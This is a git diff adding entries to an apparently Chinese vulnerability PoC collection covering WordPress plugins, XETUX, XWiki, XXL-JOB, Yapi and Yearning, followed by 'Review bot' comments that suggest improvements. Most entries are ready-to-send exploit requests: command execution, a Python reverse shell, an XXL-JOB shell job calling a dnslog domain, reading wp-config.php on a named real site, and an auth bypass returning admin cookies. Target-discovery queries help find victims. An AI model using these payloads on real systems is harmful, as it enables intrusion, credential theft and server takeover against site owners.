HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Referer: https://blog.tool.wux.nl/ +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: su_webp=1 +Connection: close +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041355933.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/FxogQW3DX58JYtWxFfxSIQ \ No newline at end of file diff --git a/WordPress插件query-console存在未授权RCE漏洞.md b/WordPress插件query-console存在未授权RCE漏洞.md new file mode 100644 index 0000000..2903067 --- /dev/null +++ b/WordPress插件query-console存在未授权RCE漏洞.md 
@@ -0,0 +1,19 @@ +# WordPress插件query-console存在未授权RCE漏洞 + +WordPress Query Console插件1.0版本存在安全缺陷问题,未经身份验证的远程攻击者可利用此插件执行任意PHP代码,调用系统命令可直接造成RCE,植入webshell将进一步获取服务器权限 + +## poc + +```javascript +POST /wp-json/wqc/v1/query HTTP/1.1 +Host: +Accept: */* +Content-Type: application/json +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + +{"queryArgs":"system('cat /etc/passwd')","queryType":"WP_Query"} +``` + diff --git a/WordPress插件radio存在SSRF漏洞(CVE-2024-54385).md b/WordPress插件radio存在SSRF漏洞(CVE-2024-54385).md new file mode 100644 index 0000000..e23839a --- /dev/null +++ b/WordPress插件radio存在SSRF漏洞(CVE-2024-54385).md 
@@ -0,0 +1,86 @@ +# WordPress插件radio存在SSRF漏洞(CVE-2024-54385) + +WordPress插件radio存在SSRF漏洞(CVE-2024-54385) + +## fofa + +```javascript +body="wp-content/plugins/radio-player" +``` + +## poc + +```javascript +id: CVE-2024-54385 + +info: + name: Radio Player <= 2.0.82 - Server-Side Request Forgery + author: s4e-io + severity: high + description: | + The Radio Player Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services. + reference: + - https://patchstack.com/database/wordpress/plugin/radio-player/vulnerability/wordpress-radio-player-plugin-2-0-82-server-side-request-forgery-ssrf-vulnerability?_s_id=cve + - https://github.com/RandomRobbieBF/CVE-2024-54385 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/radio-player/radio-player-2082-unauthenticated-server-side-request-forgery + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-54385 + cwe-id: CWE-918 + epss-score: 0.00043 + epss-percentile: 0.11007 + metadata: + verified: true + max-request: 2 + vendor: softLab + product: radio-player + framework: wordpress + shodan-query: http.html:"wp-content/plugins/radio-player" + fofa-query: body="wp-content/plugins/radio-player" + tags: cve,cve2024,wordpress,wp-plugin,radio-player,ssrf + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - 'contains(body, "/wp-content/plugins/radio-player")' + - 'status_code == 200' + condition: and + internal: true + + extractors: + - type: regex + part: body + internal: true + name: nonce + group: 1 + regex: + - '"nonce":"([a-z0-9]+)",\s*"isPro"' + + - raw: 
+ - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=radio_player_get_stream_data&nonce={{nonce}}&utm_source=&url=http://{{interactsh-url}}/live.m3u8 + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "http")' + - 'contains(body, "success\":true")' + - 'contains(content_type, "application/json")' + - 'status_code == 200' + condition: and +``` + +## 漏洞来源 + +- https://github.com/projectdiscovery/nuclei-templates/pull/11454/files \ No newline at end of file diff --git a/WordPress插件rtw_pdf_file任意文件读取漏洞.md b/WordPress插件rtw_pdf_file任意文件读取漏洞.md new file mode 100644 index 0000000..4b03603 --- /dev/null +++ b/WordPress插件rtw_pdf_file任意文件读取漏洞.md @@ -0,0 +1,22 @@ +# WordPress插件rtw_pdf_file任意文件读取漏洞 + +WordPress插件rtw_pdf_file任意文件读取漏洞,适用于 WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击,包括 1.7.5 rtw_pgaepb_dwnld_pdf() 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。 + +## fofa +```javascript +"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder" +``` + +## poc +```javascript +GET /?rtw_pdf_file=../../../wp-config.php&rtw_generate_pdf=1 HTTP/1.1 +Host: korurealestate.co.uk +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241227211927240](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272119351.png) \ No newline at end of file diff --git a/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md b/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md new file mode 100644 index 0000000..1298d0c --- /dev/null +++ b/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md 
@@ -0,0 +1,37 @@ +## WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483) + +WordPress的Meetup插件在0.1及以下的所有版本中都容易绕过身份验证。这是由于插件在通过facebook_register()函数对用户进行身份验证之前没有正确验证用户的身份。这使得未经身份验证的攻击者可以作为任何用户登录,只要他们知道自己的电子邮件地址。 +注意:您需要知道您要登录的用户电子邮件地址。 + +poc +--- + +```javascript +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: kubernetes.docker.internal +Content-Type: application/x-www-form-urlencoded +Content-Length: 149 + +action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/ +``` + +Response +-- + +``` +HTTP/1.1 200 OK +Date: Tue, 05 Nov 2024 21:37:23 GMT +Server: Apache/2.4.57 (Debian) +X-Powered-By: PHP/8.2.13 +X-Robots-Tag: noindex +X-Content-Type-Options: nosniff +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +Referrer-Policy: strict-origin-when-cross-origin +X-Frame-Options: SAMEORIGIN +Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly +Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly +Set-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly +Content-Length: 0 +Content-Type: text/html; charset=UTF-8 +``` \ No newline at end of file diff --git a/WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522).md b/WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522).md new file mode 100644 index 0000000..eb82a1a 
--- /dev/null +++ b/WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522).md @@ -0,0 +1,20 @@ +# WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522) + +WordPress系统插件LearnPress存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## fofa + +```javascript +body="/wp-content/plugins/learnpress" +``` + +## poc + +```javascript +GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(8)),0) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +``` + +![image-20240926094748650](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409260948413.png) \ No newline at end of file diff --git a/Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md b/Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md new file mode 100644 index 0000000..c047c1e --- /dev/null +++ b/Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md @@ -0,0 +1,6 @@ +## Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553) + 在wordpress的Backup Migration 插件中存在代码注入漏洞,未授权的攻击者可以利用该漏洞注入恶意PHP代码并执行。 + + +## poc +- https://github.com/Chocapikk/CVE-2023-6553 diff --git a/XETUX软件dynamiccontent.properties.xhtml远程代码执行漏洞.md b/XETUX软件dynamiccontent.properties.xhtml远程代码执行漏洞.md new file mode 100644 index 0000000..dda78e3 --- /dev/null +++ b/XETUX软件dynamiccontent.properties.xhtml远程代码执行漏洞.md 
@@ -0,0 +1,31 @@ +# XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行漏洞 + +# 一、漏洞简介 +XETUX 是一个全面的解决方案,包括一套安全、强大和可监控的软件程序,专为自动控制餐厅和零售而设计和开发。XETUX 存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。 + +# 二、影响版本 ++ XETUX + +# 三、资产测绘 ++ hunter`web.title="@XETUX"&&web.title="XPOS"&&web.body="BackEnd"` ++ 特征 + +![1699982974504-882e8d2a-1432-40ed-b58d-35804b7f5b30.png](./img/zGhN8NRZI5iD2KlU/1699982974504-882e8d2a-1432-40ed-b58d-35804b7f5b30-555753.png) + +# 四、漏洞复现 +```plain +POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 1643 + +pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5YLgX1PkNY%2B1ZQ%2FnOSg5J1LDyzAjBheAxLDODIVcHkmJ6hnJsQ0YQ8bMU5%2B%2BTqeD4BGqCZMDjP%2BZQvveiUhxsUC%2F%2BtPqnOgFSBV8TBjDSPNmVoQ9YcKTGelKuJjS2kCXHjcyz7PcQksSW6UUmKu9RhJ%2Bx3Mnx6j56eroVPWnM2vdYRt5An6cLo1YPXu9uqriyg1wgm%2F7xYP%2FUwP1q8wfVeyM4fOw2xJzP6i1q4VLHLXi0VYHAIgaPrZ8gH8XH4X2Kq6ewyrJ62QxBF5dtE3tvLAL5tpGxqek5VW%2BhZFe9ePu0n5tLxWmqgqni8bKGbGrGu4IhXhCJhBxyelLQzPGLCfqmiQwYX5Ime9EHj1k5eoWQzH8jb3kQfFJ0exVprGCfXKGfHyfKfLEOd86anNsiQeNavNL7cDKV0yMbz52n6WLQrCAyzulE8kBCZPNGIUJh24npbeaHTaCjHRDtI7aIPHAIhuMWn7Ef5TU9DcXjdJvZqrItJoCDrtxMFfDhb0hpNQ2ise%2BbYIYzUDkUtdRV%2BjCGNI9kbPG5QPhAqp%2FJBhQ%2BXsqIhsu4LfkGbt51STsbVQZvoNaNyukOBL5IDTfNY6wS5bPSOKGuFjsQq0Xoadx1t3fc1YA9pm%2FEWgyR5DdKtmmxG93QqNhZf2RlPRJ5Z3jQAtdxw%2BxBgj6mLY2bEJUZn4R75UWnvLO6JM918jHdfPZELAxOCrzk5MNuoNxsWreDM7e2GX2iTUpfzNILoGaBY5wDnRw46ATxhx6Q%2FEba5MU7vNX1VtGFfHd2cDM5cpSGOlmOMl8qzxYk1R%2BA2eBUMEl8tFa55uwr19mW9VvWatD8orEb1RmByeIFyUeq6xLszczsB5Sy85Y1KPNvjmbTKu0LryGUc3U8VQ7AudToBsIo9ofMUJAwELNASNfLV0fZvUWi0GjoonpBq5jqSrRHuERB1%2BDW2kR6XmnuDdZMt9xdd1BGi1AM3As0KwSetNq6Ezm2fnjpW877buqsB%2BczxMtn6Yt6l88NRY
aMHrwuY7s4IMNEBEazc0IBUNF30PH%2B3eIqRZdkimo980HBzVW4SXHnCMST65%2FTaIcy6%2FOXQqNjpMh7DDEQIvDjnMYMyBILCOCSDS4T3JQzgc%2BVhgT97imje%2FKWibF70yMQesNzOCEkaZbKoHz498sqKIDRIHiVEhTZlwdP29sUwt1uqNEV%2F35yQ%2BO8DLt0b%2BjqBECHJzI1IhGvSUWJW37TAgUEnJWpjI9R1hT88614GsVDG0UYv0u8YyS0chh0RryV3BXotoSkSkVGShIT4h0s51Qjswp0luewLtNuVyC5FvHvWiHLzbAArNnmM7k%2FGdCn3jLe9PeJp7yqDzzBBMN9kymtJdlm7c5XnlOv%2BP7wIJbP0i4%2BQF%2BPXw5ePKwSwQ9v8rTQ%3D%3D&cmd=whoami +``` + +![1699983002251-c1a04632-044e-4c2b-addd-4b72512055d8.png](./img/zGhN8NRZI5iD2KlU/1699983002251-c1a04632-044e-4c2b-addd-4b72512055d8-006575.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pxfxhsioq9tk37xp> \ No newline at end of file diff --git a/XWikiDatabaseSearch存在远程命令执行漏洞(CVE-2024-31982).md b/XWikiDatabaseSearch存在远程命令执行漏洞(CVE-2024-31982).md new file mode 100644 index 0000000..41a42f3 --- /dev/null +++ b/XWikiDatabaseSearch存在远程命令执行漏洞(CVE-2024-31982).md 
@@ -0,0 +1,29 @@ +# XWiki DatabaseSearch存在远程命令执行漏洞(CVE-2024-31982) + +# 一、漏洞简介 +XWiki是一个由Java编写的基于LGPL协议发布的开源wiki和应用平台。它的开发平台特性允许创建协作式Web应用,同时也提供了构建于平台之上的打包应用(第二代wiki)。XWiki DatabaseSearch接口处存在RCE漏洞(CVE-2024-31982),恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。 + +# 二、影响版本 +XWiki + +# 三、资产测绘 +```plain +body="data-xwiki-reference" +``` + +![1718991317308-42e2df7f-35ed-465e-84b6-3bb246ce0832.png](./img/bKcs4dowKNy8ybF3/1718991317308-42e2df7f-35ed-465e-84b6-3bb246ce0832-659769.png) + +# 四、漏洞复现 +```java +GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+World!%22++%2B+%2850+%2B+49%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1718991292434-48a4a954-7965-4a83-ad76-c889f58e7327.png](./img/bKcs4dowKNy8ybF3/1718991292434-48a4a954-7965-4a83-ad76-c889f58e7327-084598.png) + + + +> 更新: 2024-06-23 23:42:48 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ft07tqn8syvqtesk> \ No newline at end of file diff --git a/XXL-JOB默认accessToken权限绕过漏洞.md b/XXL-JOB默认accessToken权限绕过漏洞.md new file mode 100644 index 0000000..f2d3320 --- /dev/null +++ b/XXL-JOB默认accessToken权限绕过漏洞.md 
@@ -0,0 +1,32 @@ +# XXL-JOB默认accessToken权限绕过漏洞 + +# 一、漏洞简介 +<font style="color:rgb(0, 0, 0);"> XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ <font style="color:rgb(0, 0, 0);">XXL-JOB</font> + +# <font style="color:rgb(0, 0, 0);">三、资产测绘</font> ++ hunter`app.name="XXL-JOB"` ++ 特征![1699413014637-abd39b12-24f1-4f3e-a8be-1b5a12515d2c.png](./img/sKn1oToMtxlW5Er2/1699413014637-abd39b12-24f1-4f3e-a8be-1b5a12515d2c-008562.png) + +# 四、漏洞复现 +```plain +POST /run HTTP/1.1 +Content-Type: application/json +XXL-JOB-ACCESS-TOKEN: default_token +User-Agent: Java/1.8.0_391 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 323 +Connection: close + +{"jobId": 287040,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "ping 0n3fio.dnslog.cn","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0} +``` + +![1699413047757-a647af66-cd6a-4bb0-a48f-876fe2f1c266.png](./img/sKn1oToMtxlW5Er2/1699413047757-a647af66-cd6a-4bb0-a48f-876fe2f1c266-630756.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ixd973mksvmz9c3w> \ No newline at end of file diff --git a/Yapi存在远程命令执行漏洞.md b/Yapi存在远程命令执行漏洞.md new file mode 100644 index 0000000..d22903a --- /dev/null +++ b/Yapi存在远程命令执行漏洞.md 
@@ -0,0 +1,61 @@ +# Yapi存在远程命令执行漏洞 + +# 一、漏洞简介 +Yapi存在远程命令执行漏洞 + +# 二、影响版本 ++ Yapi + +# 三、资产测绘 ++ fofa:`app="YApi"` ++ 特征 + +![1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d.png](./img/R4R5xyBZVQ_9RrKW/1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d-882788.png) + +# 四、漏洞复现 +注册账号登录 + +![1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06.png](./img/R4R5xyBZVQ_9RrKW/1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06-740149.png) + +新建项目 + +![1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2.png](./img/R4R5xyBZVQ_9RrKW/1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2-659707.png) + +添加接口 + +![1733889123950-560b7590-201a-477d-98e0-aba7da89b62a.png](./img/R4R5xyBZVQ_9RrKW/1733889123950-560b7590-201a-477d-98e0-aba7da89b62a-577318.png) + +```java +const sandbox = this +const ObjectConstructor = this.constructor +const FunctionConstructor = ObjectConstructor.constructor +const myfun = FunctionConstructor('return process') +const process = myfun() +mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString() +``` + +![1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622.png](./img/R4R5xyBZVQ_9RrKW/1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622-586119.png) + +![1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52.png](./img/R4R5xyBZVQ_9RrKW/1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52-059135.png) + +![1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7.png](./img/R4R5xyBZVQ_9RrKW/1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7-172808.png) + +反弹shell + +```java +const sandbox = this +const ObjectConstructor = this.constructor +const FunctionConstructor = ObjectConstructor.constructor +const myfun = FunctionConstructor('return process') +const process = myfun() +Poc = process.mainModule.require("child_process").spawnSync( + 'python', ['-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'] +) +``` + +![1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8.png](./img/R4R5xyBZVQ_9RrKW/1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8-057460.png) + + + +> 更新: 2024-12-20 14:53:54 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zwurnkdpoozs08fc> \ No newline at end of file diff --git a/Yearningfront接口存在任意文件读取漏洞.md b/Yearningfront接口存在任意文件读取漏洞.md new file mode 100644 index 0000000..5f3bb09 --- /dev/null +++ b/Yearningfront接口存在任意文件读取漏洞.md @@ -0,0 +1,37 @@ +# Yearning front 接口存在任意文件读取漏洞 + +# 一、漏洞简介 +Yearning是中国Henry Yee个人开发者的一个出色方便快捷的 Mysql SQL 审核平台。Yearning 2.3.1 版本、Interstellar GA 2.3.2 版本 和 Neptune 2.3.4 - 2.3.6 版本存在安全漏洞,该漏洞源于存在一个任意文件读取漏洞。攻击者可以利用该漏洞获取敏感信息。 + +# 二、影响版本 ++ Yearning + +# 三、资产测绘 ++ hunter`app.name=="Yearning"` ++ 特征 + +![1704942004441-16159972-ed25-4bab-a118-7fbef2545a8f.png](./img/KycX1QqFLArvj1s9/1704942004441-16159972-ed25-4bab-a118-7fbef2545a8f-013917.png) + +# 四、漏洞复现 +```java +GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: cross-site +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1704942049555-f29e7a81-a72a-4237-b2a4-b988bd6e3857.png](./img/KycX1QqFLArvj1s9/1704942049555-f29e7a81-a72a-4237-b2a4-b988bd6e3857-921144.png)[yearning-front-readfile.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222142312-c41a9525-b4d6-40ae-8332-da2f36609f9e.yaml) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvbgbkdvgfwckrxo> \ No newline at end of file 
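Review bot: The CVE-2024-7135 Tainacan request was captured from an administrator session: the `Cookie` header carries a live `wordpress_logged_in_…=admin%7C…` token plus a `PHPSESSID`, which contradicts the advisory's precondition (subscriber-level account) and publishes session material. Replace the cookie with a placeholder, re-capture from a subscriber account, and state that `_wpnonce` must be the `wp_rest` nonce WordPress exposes to logged-in users (cookie-authenticated REST calls accept no other nonce); "获取一下网站首页的Nonce" does not say which one.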
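Review bot: The CVE-2024-10400 Tutor LMS PoC sends `Host: academy.keune.ch`, a real third-party site; use a placeholder as the other entries do. In the Python script, the success check `all(key in response.text for key in ['c8837b23ff8aaa8a2dde915473ce099110'])` looks for `md5(123321)` (`c8837b23ff8aaa8a2dde915473ce0991`) immediately followed by `10`, so it only matches when `version()` starts with `10` (MariaDB 10.x); MySQL 5.7/8.x targets are reported as not vulnerable. Match on the 32-character hash alone and reduce the single-element `all()` to a plain `in`. `target_url_tutor_nonce = urljoin(target_url, "")` is a no-op and can be removed.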
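Review bot: The CVE-2024-12849 WP Guru template fingerprints only `GET /` for `/wp-content/plugins/error-log-viewer-wp`, but an admin-side log viewer rarely enqueues assets on the front page, so the flow stops before the `elvwp_log_download` request on most real targets; add the `readme.txt` probe the Icegram template uses (`/wp-content/plugins/error-log-viewer-wp/readme.txt`) as a second fingerprint with `stop-at-first-match`.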
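Review bot: The CVE-2024-9932 Wux Blog Editor entry gives no affected or fixed version and no expected response; since the claim is that `Referer: https://blog.tool.wux.nl/` alone logs the caller in as administrator, document the `Set-Cookie: wordpress_logged_in_…` the `/wp-json/external-post-editor/v2/autologin` endpoint returns (as the Meetup entry does) so the screenshot is not the only evidence.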
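Review bot: The Query Console entry has no 漏洞来源 section, CVE id or fix status, unlike its siblings; add the reference. The body `{"queryArgs":"system('cat /etc/passwd')","queryType":"WP_Query"}` shows that `queryArgs` is evaluated as PHP, which is the actual root cause and belongs in the description instead of "安全缺陷问题".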
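Review bot: The CVE-2024-54385 Radio Player template extracts `nonce` from `"nonce":"…","isPro"` on `GET /`, so it only works when the player's script settings are printed on the front page; state that the scanned page must embed the player, otherwise the flow stops silently at http(1) and the template reports nothing.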
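Review bot: The rtw_pdf_file PoC uses `Host: korurealestate.co.uk`, a real site; replace it with a placeholder. The entry also lacks a CVE id and 漏洞来源, and the version sentence ("1.7.5 之前的所有版本…包括 1.7.5") should read "1.7.5 及之前的所有版本" (all versions up to and including 1.7.5).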
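Review bot: The CVE-2024-50483 Meetup description says the attacker can log in as any user "只要他们知道自己的电子邮件地址"; the advisory means the attacker must know the target user's email (the `email=admin@admin.com` field in the PoC), so the precondition as translated is inverted. Worth adding that `id`, `type` and `link` are arbitrary values accepted without any verification against Facebook, which is the root cause the description alludes to.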
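Review bot: The CVE-2024-8522 LearnPress description claims the attacker can "调用xp_cmdshell写入后门文件"; `xp_cmdshell` is a Microsoft SQL Server procedure, and WordPress/LearnPress runs on MySQL/MariaDB, so that impact is impossible here. The PoC (`c_only_fields=IF(COUNT(*)!=-2,(SLEEP(8)),0)`) is a time-based blind injection; state the impact as database read access and document the ~8 s delay as the indicator.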
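Review bot: The CVE-2023-6553 Backup Migration entry is a title, one sentence and a link; unlike the surrounding entries it gives no affected version, endpoint or request, so it cannot be used without leaving the corpus. Pull in at least the vulnerable path and the request shape from the linked PoC.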
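Review bot: The XETUX request (`POST …/javax.faces.resource/dynamiccontent.properties.xhtml` with `pfdrt=sc&ln=primefaces&pfdrid=…&cmd=whoami`) is the PrimeFaces expression-language injection (CVE-2017-1000486), not a flaw in XETUX's own code; the entry should say so, because the opaque `pfdrid` blob is a pre-encrypted EL expression that reads the command from `cmd` and only decrypts on a PrimeFaces build still using the default secret. Readers can change `cmd` freely but cannot edit the blob, which is worth stating next to it.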
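Review bot: The CVE-2024-31982 XWiki PoC closes the search text with `}}}` and injects `{{async async=false}}{{groovy}}println("Hello World!" + (50 + 49)){{/groovy}}{{/async}}`, but the entry never says what to look for: a vulnerable instance returns `Hello World!99` in the plain-text body, which is the marker to match on. "影响版本: XWiki" should list the affected and fixed branches from the advisory rather than the product name.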
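Review bot: The XXL-JOB PoC posts `/run` with `XXL-JOB-ACCESS-TOKEN: default_token`, which is an executor API, not an admin-console endpoint; the hunter query `app.name="XXL-JOB"` finds admin consoles, so the entry should say the request goes to the executor's embedded server (its own port, 9999 by default) and that the console only helps locate executors. The `glueSource` callback `ping 0n3fio.dnslog.cn` is a stale one-off domain; replace it with a placeholder.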
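Review bot: The Yapi entry's 漏洞简介 merely repeats the title; the code shows the root cause (mock scripts run in a Node sandbox whose `this.constructor.constructor('return process')` escape reaches `child_process`), so state that along with the affected and fixed versions. In the reverse-shell variant, `s.connect(("127.0.0.1",6699))` connects back to the target itself; use an attacker-host placeholder.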
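Review bot: The Yearning request line says `HTTP/2`, but the example is a raw HTTP/1.1-style request (text headers, `Connection: close`) and cannot be replayed as written over a socket; use `HTTP/1.1`. The 影响版本 section says only "Yearning" while the 漏洞简介 already names 2.3.1, 2.3.2 and 2.3.4–2.3.6; move the versions there. The yuque attachment link glued to the screenshot line should become a proper reference under 漏洞来源.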
